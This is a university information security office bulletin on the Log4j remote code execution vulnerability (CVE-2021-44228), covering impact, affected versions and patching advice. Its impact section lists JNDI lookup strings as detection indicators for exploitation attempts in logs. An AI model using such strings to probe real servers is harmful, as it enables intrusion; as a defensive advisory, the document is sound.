IT Professionals:
The University Information Security Office (UISO) updated their security bulletin regarding the Critical Remote Code Execution Vulnerability in Log4j [1]. As of today, the UISO recommends that all system/application owners immediately patch to log4j 2.16.0+. There are no known, reliable workarounds at this time. Those who are unable to patch should restrict access to systems via host-based or data center firewalls until patches can be applied. Please contact the UISO directly if you are unable to patch.
Thank you for your partnership in keeping IU secure.
–IT Community Partnerships on behalf of the University Information Security Office
—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA1
The most recent version of this bulletin can be found online at the Information Security website[1].
Title
Critical Remote Code Execution Vulnerability in Log4J
Update: As of December 15th, the UISO recommends that users patch to log4j v 2.16.0+. There are no other known workarounds at this time, users who are unable to patch should restrict access to systems via host-based or data center firewalls until patches can be applied. Please contact the UISO if you are unable to patch at this time.
Background
On December 9, 2021, a critical remote code execution vulnerability was publicly disclosed affecting multiple versions of the open-source Apache Log4j logging framework. This vulnerability has been assigned CVE-2021-44228.
Impact
Log4j is widely used in many applications and may be present as an embedded dependency in many commercial or open-source products. These may include commercial applications, locally developed applications, and cloud services. IT Pros can identify if their systems are affected by examining log files for any services utilizing Log4j. Logs containing client-controlled strings such as user-agent, URL strings, or form field submissions are potentially vulnerable. The presence of ‘jndi’ strings in log events may indicate attempts at exploitation.
Examples include: ‘jndi:ldap:/’, ‘jndi:rmi:/’, ‘jndi:ldaps:/’, or ‘jndi:dns:/’. Note, this is not an exhaustive list.
Upon identification of exploitation attempts, immediately initiate incident response procedures and notify the University Information Security Office (UISO) via it-incident@iu.edu.
Platforms Affected
The vulnerability impacts Apache Log4j versions 2.0 to 2.15, however 1.x versions are no longer supported and may also be vulnerable. Any service or application using the log4j framework to write log data to disk may be at risk and should be evaluated.
For a comprehensive list please see: https://github.com/cisagov/log4j-affected-db.
Local Observations
The UISO has observed local exploitation of this vulnerability. CISA has observed numerous threat actors engaged in widespread Internet-based exploitation of this vulnerability.
UISO Recommendations
Admins must patch to log4j-2.16.0 or newer. For commercial products, install vendor supplied updates; if no updates are available, inquire with vendor support as soon as possible and restrict access to systems via host-based or data center firewalls until patches can be applied. Mitigations for versions earlier than 2.15 are not effective.
Workarounds
There are no known reliable workarounds at this time. If you or your vendor are unable to patch, please contact UISO.
Further Reading
[1] https://informationsecurity.iu.edu/security-bulletins/bulletins-2021-12-10-log4j-remote-code-execution.html
[2] https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/
[3] https://www.lunasec.io/docs/blog/log4j-zero-day/
[4] https://www.randori.com/blog/cve-2021-44228/
[5] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
[6] https://logging.apache.org/log4j/2.x/